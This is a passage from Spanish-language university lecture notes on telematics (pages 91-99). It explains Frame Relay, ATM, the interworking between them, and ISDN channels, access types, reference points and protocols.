desde 2.4 bps hasta 45Mbps e incluso mayores en algunas implementaciones. Inicialmente fue
concebido para el transporte de datos, pero nuevos desarrollos permiten el transporte de voz y ahora
vídeo, su uso es generalizado en el backbone de redes de datos, para el transporte de protocolos
heredados (legacy protocols) y conexión de enrutadores.
Frame Relay fue concebido originalmente como un protocolo para uso sobre interfaces ISDN ( interfaces
para la Red Digital de Servicios Integrados), proporciona la capacidad de comunicación de paquetes de
conmutación de datos que es usada a través de la interface entre los dispositivos de usuario (por
ejemplo, routers, puentes, máquinas hosts,...) y equipos de red (por ejemplo, nodos de intercambio). la
red que proporciona la interface Frame Relay puede ser o una red pública o una red de equipos privados
sirviendo a una sola empresa.
Su característica primaria más competitiva es el bajo coste (frente a ATM, más rápido pero también
mucho más costoso). Hay dos condiciones básicas que deberían existir para justificar la utilización de
frame relay. :
La línea de transmisión debe ser buena. Frame Relay solo funcionará eficientemente si la tasa
de error del medio físico es baja.
Los nodos conectados a Frame Relay no deben ser terminales tontos, sino que correrán sus
propios protocolos para control de flujo, recuperación de errores y envío de asentimientos.

Características de Frame Relay.


Como interface a una red, Frame Relay es del mismo tipo de protocolo que X.25. Sin embargo, Frame
Relay difiere significativamente de X.25 en su funcionalidad y formato. En particular, Frame Relay es un
protocolo más perfeccionado, que proporciona un desarrollo más alto y una mayor eficiencia.
Frame Relay es una forma simplificada de la conmutación de paquetes , similar en principio a X.25, en la
cual las tramas de datos síncronas son enrutadas a diferentes destinos dependiendo de su información
de cabecera.
La gran diferencia entre Frame Relay y X.25 es que X.25 garantiza la integridad de los datos y la red
maneja el flujo de control, a costa de algún retraso en la red. Frame relay conmuta las tramas mucho
más rápido extremo a extremo, pero no hay garantía de que la integridad de los datos se total.

____________________________________________________________________________________________________________________
UNdeC Página 91
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Como interface entre usuario y equipo de red, Frame Relay proporciona unos métodos para multiplexar
satisfactoriamente muchas conversaciones lógicas de datos (relacionados con circuitos virtuales) sobre
un único enlace físico de transmisión. Esto contrasta con los sistemas que usan sólo técnicas de
multiplexación por división en el tiempo (TDM) para soportar múltiples flujos de datos. Frame Relay tiene
multiplexación estadística que proporciona un uso más flexible y eficiente del ancho de banda disponible.
Puede ser usada sin técnicas TDM o sobre los canales proporcionados por sistemas TDM.
Otra característica importante de Frame Relay es que explota los recientes avances en la tecnología de
transmisión en redes de área amplia (WAN). Los protocolos más tempranos de transmisión en WAN's
como X.25 fueron desarrollados cuando los sistemas de transmisión analógica y por medios de cobre
predominaban. Estos enlaces son mucho menos seguros que los medios de fibra y los enlaces de
transmisión digital disponibles hoy en día. Sobre enlaces como éstos, los protocolos de la capa de
enlace pueden prescindir del tiempo que se gasta en aplicar algoritmos de corrección de errores,
dejando que éstos sean desarrollados por capas de niveles superiores.
Un mayor desarrollo y eficiencia es así posible sin sacrificar la integridad de los datos. Frame Relay
incluye un algoritmo de chequeo cíclico redundante (CRC) para detectar bits corruptos (así el dato puede
ser descartado), pero no incluye ningún mecanismo de protocolo para corregir los datos erróneos. Frame
Relay, por tanto, no incluye procedimientos explícitos de control de flujo que duplique los existentes en
capas superiores . De hecho, sólo se proporcionan unos mecanismos muy simples de notificación de
congestión , para permitir a una red informar a un dispositivo de usuario que los recursos de red están
cerca de un estado de congestión. Esta notificación puede avisar a los protocolos de las capas más altas
de que el control de flujo puede necesitarse.
Frame Relay es de un coste efectivo, ello es debido en parte a que los requerimientos de
almacenamiento en la red están cuidadosamente optimizados. También puede ser usada como una
interface a un proveedor público de servicios o a una red de equipo privado. Un método típico de
implementación de red privada es equipar los tradicionales multiplexores T1 con interfaces Frame Relay
para dispositivos de datos, así como interfaces no-Frame Relay para otras aplicaciones tales como voz y
video-teleconferencia.
Un servicio público Frame Relay es desplegado poniendo equipos Frame Relay de conmutación en las
oficinas centrales de un proveedor de telecomunicaciones. En este caso, los usuarios pueden obtener
beneficios económicos de las limitaciones de cargos sensibles al tráfico, y son relevados del trabajo
necesario que conlleva administrar y mantener el equipo de red y el servicio.
De este modo, los tradicionales conmutadores de circuitos, conmutadores de paquetes, o una
combinación híbrida de estas tecnologías pueden ser usadas.
Un servicio público Frame Relay es desplegado poniendo equipos Frame Relay de conmutación en las
oficinas centrales de un proveedor de telecomunicaciones. En este caso, los usuarios pueden obtener
beneficios económicos de las limitaciones de cargos sensibles al tráfico, y son relevados del trabajo
necesario que conlleva administrar y mantener el equipo de red y el servicio.

7.4. Que es ATM ?


ATM (Asynchronous Transfer Mode / "Modo de Transferencia Asyncrono") es un protocolo de transporte
de alta velocidad, sus implementaciones actuales son en la red local en compañías que requieren
grandes anchos de banda (ATM es capaz de ofrecer servicios de hasta 155 Mbps) y en la red amplia
como backbone de conmutación de las redes que lo requieren y que además tiene factibilidad de
conexión a redes de alta velocidad (Principalmente carriers y proveedores de servicio).
ATM es radicalmente un nuevo tipo de tecnología de switching basada en celdas, está basada en ISDN
Broadband (B-ISDN). ATM se dio a conocer en el mundo a partir de 1990. Si usamos ATM, la
información a enviar es dividida en paquetes de longitud fija. Estos son mandados por la red y el
destinatario se encarga de poner los datos en su estado inicial. Los paquetes en ATM tienen una longitud
fija de 53 bytes. Siendo la longitud de los paquetes fija, permite que la información sea transportada de
una manera predecible. El hecho de que sea predecible permite diferentes tipos de trafico en la misma
red.
Los paquetes están divididos en dos partes, la cabecera y payload. El payload (que ocupa 48 bytes) es
la parte del paquete donde viaja la información, ya sean datos, imágenes o voz. La cabecera (que ocupa
5 bytes) lleva el mecanismo direcccionamiento.
Otro concepto clave es que ATM está basado en el uso de conmutadores. Hacer la comunicación por
medio de un conmutador (en vez de un bus) tiene ciertas ventajas: Reserva de ancho de banda para la

____________________________________________________________________________________________________________________
UNdeC Página 92
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

conexión, Mayor ancho de banda, Procedimientos de conexión bien definidos, Velocidades de acceso
flexibles. ATM es una arquitectura estructurada en capas que permite que múltiples servicios como voz y
datos vayan mezclados en la misma red. Tres de las capas han sido definidas para implementar los
rasgos del ATM.
La capa de adaptación garantiza las características apropiadas del servicio y divide todos los tipos de
datos en payload de 48 bytes que conformaran el paquete ATM. La capa intermedia de ATM coge los
datos que van a ser enviados y añade los 5 bytes de la cabecera que garantiza que el paquete se envía
por la conexión adecuada. La capa física define las características eléctricas y los interfaces de la red.
ATM no esta ligado a un tipo especifico de transporte físico.}

ATM y sus Beneficios:


Una única red ATM dará cabida a todo tipo de trafico(voz, datos y vídeo). ATM mejora la eficiencia y
manejabilidad de la red.
Capacita nuevas aplicaciones - debido a su alta velocidad y a la integración de los tipos de
trafico, ATM capacitara la creación y la expansión de nuevas aplicaciones como la multimedia.
Compatibilidad : porque ATM no esta basado en un tipo especifico de transporte físico, es
compatible con las actuales redes físicas que han sido desplegadas. ATM puede ser
implementado sobre par trenzado, cable coaxial y fibra óptica.
Simplifica el control de la Red - ATM esta evolucionando hacia una tecnología standard para
todo tipo de comunicaciones. Esta uniformidad intenta simplificar el control de la red usando la
misma tecnología para todos los niveles de la red.
Largo periodo de vida de la arquitectura- Los sistemas de información y las industrias de
telecomunicaciones se están centrando y están estandarizado el ATM. ATM ha sido diseñado
desde el comienzo para ser flexible en: Distancias geográficas, Numero de usuarios, Acceso y
ancho de banda.

ATM y algunas debilidades:


Muchos analistas de la industria ven a ATM como un término largo, una tecnología estratégica, y que
finalmente todas las LAN tenderán hacia ATM. Sin embargo, ATM es radicalmente distinto a las
tecnologías LAN de hoy en día, lo cual hace que muchos conceptos tomen años en ser estandarizados.
los sistemas operativos actuales y las familias de protocolos en particular, requerirán de modificaciones
significativas con el fin de soportar ATM. Esto será muy costoso, molesto y consumirá tiempo.
Algunas personas pagarán mucho por estar en la punta de la tecnología, pero por los momentos, las
actuales tecnologías de alta velocidad como FDDI, Fast Ethernet e Ehernet Switched proveerán
rendimiento a precios que los productos ATM no serán capaz de competir. Sólo una vez que las ventas
de ATM alcancen volúmenes significativos el costo de los productos podrán competir con la tecnología
de hoy en día.

7.5. ATM y Frame Relay, Competencia o Coexistencia.


Los Forums Frame Relay y ATM han ratificado ya algunas normas cuya importancia no sólo reside en
ayudar a proteger las inversiones realizadas en equipos Frame Relay actuales, sino también en
proporcionar un método adecuado de migración a ATM. Dichos estándares también facilitan accesos de
bajo coste a usuarios de Frame Relay remotos a las redes troncales corporativas basadas en ATM.
Hay dos tipos de interoperatividad: de red y de servicio. Ambas son el campo respectivo de atención de
los estándares Frame Relay/ATM Network interworking y Frame Relay/ATM Service Interworking,
ratificados en diciembre de 1994 y abril de 1995, también respectivamente. Más reciente, la norma
Frame UNI (FUNI) representa una tercera alternativa.

Interopertavidad de Red y Servicio


Frame Relay/ATM Network Interworking permite a los usuarios finales de dispositivos o redes Frame
Relay comunicar entre sí a través de una red ATM sin necesidad de efectuar ningún cambio de
equipamiento. La interoperatividad de red se produce cuando se utiliza un protocolo en cada extremo de
la transmisión y otro distinto en el camino entre ambos puntos. En un punto de la red, y de forma
totalmente transparente para el usuario, los paquetes Frame Relay son segmentados en celdas ATM,
que, a su vez, serán reagrupadas en paquetes Frame Relay antes de alcanzar su destino.

____________________________________________________________________________________________________________________
UNdeC Página 93
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

La interoperatividad de servicio, por su parte, permite establecer comunicación directa entre dispositivos
y usuarios Frame Relay, y dispositivos y usuarios ATM, mediante la conversión de los respectivos
protocolos. Así, por ejemplo, Frame Relay/ATM Service Internetworking permite que los dispositivos
Frame e Relay situados en oficinas remotas accedan a aplicaciones basadas en ATM residentes en las
oficinas centrales. Como es lógico, para que ello sea posible es preciso compensar las diferencias entre
ambas tecnologías, operación que corre a cargo de Interworking Function (IWF), localizada
generalmente en los conmutadores situados en las fronteras de los servicios Frame Relay y ATM.
IWF se encarga de la conversión de diferentes parámetros entre redes Frame Relay y ATM,
determinando, entre otras cosas, la forma y delimitación de tramas o celdas en el modo apropiado, la
especificación de la "elección de descartes" (discard eligibility) y prioridad de pérdida de celdas, así como
el envío o recepción de indicaciones de congestión y conversión de los Data Link Connection Identifier
(DLCI) de Frame Relay a los Virtual Path Identifier/virtual Circuit Identifier (VPI / VCI) de ATM.
IWF, además, se encarga de la gestión de tráfico, del soporte de interoperatividad de gestión de circuito
virtuales permanentes mediante indicadores de estado, y de encapsular el protocolo de usuario de nivel
superior. En general, en un entorno Frame Relay/ATM Service Interworking, IWF afronta todas las tareas
asociadas con la traducción del mensaje basado en UNI (User-to-Network Interface) Q.922 Core de
Frame Relay al mensaje basado UNI AAL5 Class C de la red ATM. Este modo de mensaje es usado
para la conexión ATM porque rinde algunas funciones básicas similares al servicio Q.922 DL Core de
Frame Relay.

ATM FRAME UNI


Un camino alternativo a las opciones expuestas lo constituye el estándar de interfaz de red de usuario
basada en tramas, FUNI (ATM Frame User Network Interface), especificado por el ATM Forum para
extender el alcance de las redes troncales ATM a lugares más pequeños. FUNI despliega un servicio
ATM para datos a velocidades de 64 Kbps a 2 Mbps siguiendo un concepto bastante simple. A través de
FUNI, los datos de baja velocidad entran en la red ATM en forma de tramas, que son convertidas en
celdas y enviadas a través de la red hacia la UNI de destino. Por supuesto, el proceso puede ser el
inverso; un circuito virtual puede originarse en una celda UNI y terminar en una trama UNI.

Enfoques de Interoperatividad
Los operadores de telecomunicación utilizan básicamente dos enfoques para ofrecer interoperatividad de
servicio Frame Relay/ATM . Uno de ellos se basa en una arquitectura dual que descansa sobre una
plataforma para Frame Relay y otra para ATM. El otro método consiste en utilizar una sola plataforma
multifunción para soportar ambos servicios. En los dos casos, la función de interoperatividad recae
normalmente en la tarjeta de puerto Frame Relay, aunque algunas plataformas de conmutación ofrecen
conversión de protocolo de un modo distribuido. Desde una perspectiva tecnológica, el resultado final es
el mismo, pero existentes diferencias en cuanto a escalabilidad y número de usuarios soportados en
favor del primero, aunque a un mayor coste. El segundo, por su parte, proporciona al operador un mayor
control sobre la red.

CONCLUSIONES
ATM promete revolucionar la industria de las comunicaciones. Sin embargo, por ser una tecnología
radicalmente diferente, los cambios son visibles y grandes. Hoy en día, distintas tecnologías son usadas
para transmitir tráfico LAN y WAN, y diferentes redes existen para transmitir voz y datos, ATM promete
entregar una red digital unificada para transportar datos, voz y vídeo sobre LANs y WANs. ATM está
emergiendo como una tecnología estratégica la cual posee las siguientes ventajas sobre Frame Relay :
ATM es una tecnología de switching; no sufre de los problemas de latencia de las transmisiones basadas
en paquetes y medios compartidos. ATM switching provee ancho de banda dedicado para la conexión,
haciéndola ideal para aquellas aplicaciones de tiempo crítico como voz y vídeo.
ATM hace fácil la creación de LANs virtuales (VLANs), garantizando ancho de banda flexible cuando y
donde sea necesario. Fácil administración y reconfiguración son también parte de ATM.
ATM escala fácilmente. ATM estará disponible en diferentes velocidades para distintas aplicaciones (25,
51, 155 y 622 Mbps. ATM permitirá la integración de LANs y WANs, permitiendo que los mismos tipos de
datos sean usados en cualquier lugar. Esto harán obsoletos muchos de los routers de hoy en día.
ATM puede asignar ancho de banda bajo demanda donde y cuando sea necesario a través de circuitos
virtuales. Muy distinto a la tecnología basada en frame, la cual usa una conexión permanente todo el
tiempo. Esta asignación dinámica provee una poderosa capacidad de administración.

____________________________________________________________________________________________________________________
UNdeC Página 94
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

La ventaja que proporciona la interoperatividad de servicio consiste en permitir la elección de la


tecnología más apropiada para cada entorno de la organización, evitando la, a veces innecesaria,
homogeneización de las redes. Asimismo, facilita el proceso de migración hacia ATM, que, de este
modo, puede emprenderse localización a localización.

REFERENCIAS
BIANCHI, ALDO. 1996. Las telecomunicaciones en Venezuela.
BAUM, SALOMON. 1997. Telecomunicaciones en Crisis. Revista Opinión.
CONATEL, "Telecomunicaciones: Pilar del desarrollo del país', 1993.
NEWSWEEK, OCTUBRE 1995, "Get Ready for D-Day", BILL POWEL.
http://www.networking.ibm.com
http://www.networking.ibm.com/223/223over.html
http://www.infotech.tu-chemnitz.de/~paetz/atm
http://www.babelfish.altavista.digital.com/cgi-bin
http://www.mainstreetxpress.com

7.6. ISDN
Según la UIT-T podemos definirla como Red Digital de Servicios Integrados (RDSI o ISDN en inglés)
como: una red que procede por evolución de la Red Digital Integrada (RDI) y que facilita conexiones
digitales extremo a extremo para proporcionar una amplia gama de servicios, tanto de voz como de otros
tipos, y a la que los usuarios acceden a través de un conjunto de interfaces normalizados.
Se puede decir entonces que es una red que procede por evolución de la red telefónica existente, que al
ofrecer conexiones digitales de extremo a extremo permite la integración de multitud de servicios en un
único acceso, independientemente de la naturaleza de la información a transmitir y del equipo terminal
que la genere.
En el estudio de la RDSI se han definido unos llamados puntos de referencia que sirven para delimitar
cada elemento de la red. Estos son llamados R, S, T, U y V, siendo el U el correspondiente al par de
hilos de cobre del bucle telefónico entre la central y el domicilio del usuario, es decir, entre la central y la
terminación de red TR1.
El concepto de RDSI se introduce mejor considerándolo desde distintos puntos de vista:

Principios de la RDSI
1. Soporte de aplicaciones, tanto de voz como de datos, utilizando un conjunto de aplicaciones
estándar.
2. Soporte para aplicaciones conmutadas y no conmutadas. RDSI admite tanto conmutación de
circuitos como conmutación de paquetes. Además, RDSI proporciona servicios no conmutados
con líneas dedicadas a ello.
3. Dependencia de conexiones de 64 kbps. RDSI proporciona conexiones de conmutación de
circuitos y de conmutación de paquetes a 64 kbps. Este es el bloque de construcción
fundamental de la RDSI.
4. Inteligencia en la red. Se espera que la RDSI pueda proporcionar servicios sofisticados por
encima de la sencilla situación de una llamada de circuito conmutado.
5. Arquitectura de protocolo en capas. Los protocolos para acceso a la RDSI presentan una
arquitectura de capas que se puede hacer corresponder con la del modelo OSI.
6. Variedad de configuraciones. Es posible más de una configuración física para implementar
RDSI. Esto permite diferencias en políticas nacionales, en el estado de la tecnología, y en las
necesidades y equipos existentes de la base de clientes,

La interfaz del usuario


El usuario tiene acceso a la RDSI mediante un interfaz local a un flujo digital con una cierta velocidad
binaria y un ancho de banda determinado.
Hay disponibles flujos de varios tamaños para satisfacer diferentes necesidades. Por ejemplo un cliente

____________________________________________________________________________________________________________________
UNdeC Página 95
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

residencial puede requerir sólo capacidad para gestionar un teléfono o un terminal de videotexto. Una
oficina querrá sin duda conectarse a la a RDSI a través de una centralita (PBX) digital local, y requerirá
un flujo de mucha más capacidad.

Interfaces y Funciones
Canales RDSI
El flujo digital entre la central y el usuario RDSI se usa para llevar varios canales de comunicación. La
capacidad del flujo, y por tanto el número de canales de comunicación, puede variar de un usuario a otro.
Para la transferencia de información y señalización se han definido los siguientes canales:

Canal B: es el canal básico de usuario. Es un canal a 64 kbps para transporte de la información


generada por el terminal de usuario. Se puede usar para transferir datos digitales, voz digital
codificada PCM, o una mezcla de tráfico de baja velocidad, incluyendo datos digitales y voz
digitalizada descodificada a la velocidad antes mencionada de 64 kbps. Puede subdividirse en
subcanales, en cuyo caso todos ellos deben establecerse entre los mismos extremos
subcriptores. Puede soportar las siguientes clases de conexiones:

Conmutación de circuitos: es el equivalente al servicio digital conmutado disponible en


la RDI. El usuario hace una llamada y se establece una conexión de circuito conmutado
con otro usuario de la red, con unos recursos dedicados. Cabe destacar que el diálogo
de establecimiento de la llamada no tiene lugar en el canal B, sino en el D, que se define
a continuación.
Conmutación de paquetes: el usuario se conecta a un nodo de conmutación de
paquetes y los datos se intercambian con otros usuarios vía X.25. Los recursos no son
dedicados.
Permanentes: no requiere un protocolo de establecimiento de llamada. Es equivalente a
una línea alquilada. Se contrata un canal fijo, permanente.

Canal D: es un canal de señalización a 16 ó 64 kbps. Sirve para dos fines. Primero, lleva
información de señalización para controlar las llamadas de circuitos conmutados asociadas con
los canales B. Además el canal D puede usarse para conmutación de paquetes de baja
velocidad mientras no haya esperando información de señalización.
Canales H: son canales destinados al transporte de flujos de información de usuario a altas
velocidades, superiores a 64 kbps.

En la RDSI están definidos los siguientes canales H:


H0 Velocidad 384 kbps (equivalente a 6B).
H10 Velocidad 1472 kbps (equivalente a 23B).
H11 Velocidad 1536 kbps (equivalente a 24B).
H12 Velocidad 1920 kbps (equivalente a 30B).
Acceso Básico
El acceso básico consiste en dos canales B full-duplex de 64 kbps y un canal D full-duplex de 16 kbps.
Luego, la división en tramas, la sincronización, y otros bits adicionales dan una velocidad total a un punto
de acceso básico de 192 kbps x segundo
2B+D+señalización+sincronización+mantenimiento
Acceso Primario
El acceso primario está destinado a usuarios con requisitos de capacidad mayores, tales como oficinas
con centralita (PBX) digital o red local (LAN). Debido a las diferencias en las jerarquías de transmisión
digital usadas en distintos países, no es posible lograr un acuerdo en una única velocidad de los datos.
Estados Unidos, Japón y Canadá usan una estructura de transmisión basada en 1.544 Mbps, mientras
que en Europa la velocidad estándar es 2.048 Mbps. Típicamente, la estructura para el canal de 1.544
Mbps es 23 canales B más un canal D de 64 kbps y, para velocidades de 2.048 Mbps, 30 canales B más
un canal D de 64 kbps.
30B(64)+D(64)señalización+sincronización(64) 2048 Europa (E1)
23B(64)+D(64)señalización+sincronización(8) 1544 Estados Unidos, Japón (T1).
____________________________________________________________________________________________________________________
UNdeC Página 96
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Servicios
Portadores
Modo Circuito: son las funciones que se necesitan para establecer, mantener, y cerrar una
conexión de circuito conmutado en un canal de usuario. Esta función corresponde al control de
una llamada en redes de telecomunicaciones de conmutación de circuitos existentes.
Modo Paquete: son las funciones que se necesitan para establecer una conexión de circuito
conmutado en un nodo de conmutación de paquetes RDSI.
o Servicio Portador de Llamada Virtual.
o Servicio Portador de Circuito Virtual Permanente.
Teleservicios
Telefonía a 7 kHz
Facsímil Grupos 2 y 3 Facsímil Grupo 4
Teletex, Videotex, Videotelefonía.
Suplementarios
o Grupo Cerrado de usuarios.
o Identificación del usuario llamante.
o Restricción de la identificación del usuario llamante.
o Identificación de usuario conectado.
o Restricción de la identificación de usuario conectado.
o Identificación de llamada en espera.
o Marcación directa de extensiones.
o Múltiples números de abonado.
o Marcación abreviada.
o Conferencia a tres.
o Desvío de llamadas.
o Transferencia de llamadas dentro del bus pasivo.
o Información de Tarificación.

Adaptación de terminales
Para conectar dispositivos no-RDSI a la red se utilizan adaptadores de Terminal (AT) que realizan las
siguientes funciones.
Adaptación de Velocidad (AV)
Conversión de Señalización (CS)
Conversión X.25 (AV +CS )
Conversión de Interfaz física.
Digitalización.
Interfaz Usuario-Red
Para definir los requisitos de acceso del usuario a RDSI, es muy importante comprender la configuración
anticipada de los equipos del usuario y de las interfaces normalizadas necesarias. El primer paso es
agrupar funciones que pueden existir en el equipo del usuario.
Puntos de Referencia: puntos conceptuales usados para separar grupos de funciones.
Agrupaciones funcionales: ciertas disposiciones finitas de equipos físicos o combinaciones de
equipos.
El equipo terminal es el equipo de abonado que usa RDSI. Se definen dos tipos. El equipo terminal de
tipo 1 (ET1) son dispositivos que soportan la interfaz RDSI normalizada. Por ejemplo: teléfonos digitales,
terminales de voz/datos integrados y equipos de fax digitales. El equipo terminal de tipo 2 (ET2)
contempla la existencia de equipos no RDSI. Por ejemplo, ordenadores huésped con una interfaz X.25.
Tal equipo requiere un adaptador de terminal (AT) para conectarse a la interfaz RDSI.
Soporte de los servicios
Puntos 1 o 2: (T y S) Servicios Básicos.
Punto 4 : (R) acceso a otros servicios estandarizados. (Interfaces X y V ).

____________________________________________________________________________________________________________________
UNdeC Página 97
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Puntos 3 y 5 : Acceso a Teleservicios


3 Terminales RDSI
5 Terminales RDSI
El punto de referencia T (terminal) corresponde a la mínima terminación de red RDSI del equipo cliente.
Separa el equipo del proveedor de red de del equipo de usuario.
El punto de referencia S (sistema) corresponde a la interfaz de terminales individuales RDSI. Separa el
equipo terminal del usuario de las funciones de comunicación relacionadas con la red.
El punto de referencia R ( razón o rate ) proporciona una interfaz no RDSI entre el equipo del usuario que
no es RDSI compatible y el equipo adaptador.

Arquitectura de Protocolos
Desde el punto de vista del estándar OSI, una pila RDSI consta de tres protocolos:
Capa física
Capa de enlace, o data link layer (DLL)
Capa de red, o network layer (el protocolo RDSI, propiamente dicho)
Desde el punto de vista del interfaz con el usuario, se incluyen sobre la capa de red protocolos para
Interacción Usuario - Red y protocolos para interacción Usuario - Usuario.
En el contexto del modelo ISO, los protocolos que se definen o a los que se hace referencia en RDSI.
Como RDSI es esencialmente indiferente a las capas de usuario de la 4 a la 7. El acceso concierne
únicamente a las capas de la 1 a la 3. La capa 1, definida en I.430 e I.431, especifica la interfaz física
tanto para el acceso básico como el primario.
Las diferencias con el modelo ISO son:
Múltiples protocolos interrelacionados.
Llamadas Multimedia.
Conexiones Multipunto.
Para el canal D, se ha definido una nueva normalización de capa de enlace de datos, LAPD(protocolo de
la capa de enlace RDSI que proviene del LAP-B (Link access procedure, balanced), Link Access
Procedure on the D channel). Esta normalización se basa en HDLC?, modificado para cumplir los
requisitos d RDSI. Toda transmisión en el canal D se da en forma de tramas LAPD que se incrementan
entre el equipo abonado y un elemento de conmutación RDSI. Se consideran tres aplicaciones:
señalización de control, conmutación de paquetes, y telemetría.
El canal B se puede usar para conmutación de circuitos, circuitos semipermanentes, y conmutación de
paquetes. Para conmutación de circuitos, se construye un circuito en n canal B bajo demanda.
Un circuito semipermanente es un circuito canal B que se ha establecido previo acuerdo entre los
usuarios conectados y la red. Tanto la conexión de circuito conmutado como con circuito
semipermanente, las estaciones conectadas intercambian información como si se hubiese establecido un
enlace directo full duplex.
En el caso de conmutación de paquetes, se establece una conexión de circuito conmutado en un canal B
entre el usuario y el nodo del paquete conmutado usando el protocolo del canal D.

Conexiones RDSI
RDSI proporciona tres tipos de servicios para comunicaciones extremo a extremo.
1. Circuitos Conmutados sobre el canal B: la configuración de red y protocolos para conmutación
de circuitos implican usuario y la red de establecimiento y cierre de llamadas, y para acceso a las
instalaciones de la red
2. Conexiones permanentes sobre canal B: un periodo de tiempo indefinido después de la
suscripción. No existe establecimiento y liberación de llamada sobre canal D.
3. Conmutación de paquetes proporcionado por RDSI.

Conector RJ-45
pins NT
1 Power Sink 3+ 2 Power Sink 3- 3 Receive positive 4 Transmit positive 5 Transmit negative 6 Receive
negative 7 Power Source 2- 8 Power Source 2+

____________________________________________________________________________________________________________________
UNdeC Página 98
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Numeración
Una dirección RDSI puede utilizarse para:
Identificar un terminal específico dentro de una línea digital RDSI.
Identificar un punto de acceso al servicio de red en un entorno OSI.
Identificar un punto de acceso al servicio de red en un entorno no conforme al modelo OSI.
Numeración (Servicios)
Múltiples números de abonados.
Permite que terminales conectados a las redes existentes alcancen terminales compatibles conectados a
un acceso básico en una configuración tipo bus pasivo.
Requisitos mínimos:
Se asignará un número a todos los terminales pertenecientes al mismo servicio.
Se asignará un número distinto a los terminales de los siguientes servicios.
Telefónico
Facsímil
Datos serie V
Datos en modo paquete
La instalación de un usuario de acceso básico a la RDSI se caracteriza por la existencia de un equipo de
transmisión de red (TR ó TR1), que hace de separación entre la transmisión a dos hilos de TR1 a central
telefónica, la transmisión a cuatro hilos entre TR1 y los equipos terminales (ET ó TR2)
Configuraciones de Cableado
Punto a punto (1 ET)
Bus pasivo corto (hasta 8 ET's)
Bus pasivo Extendido (hasta 4 ET's)

____________________________________________________________________________________________________________________
UNdeC Página 99

You might also like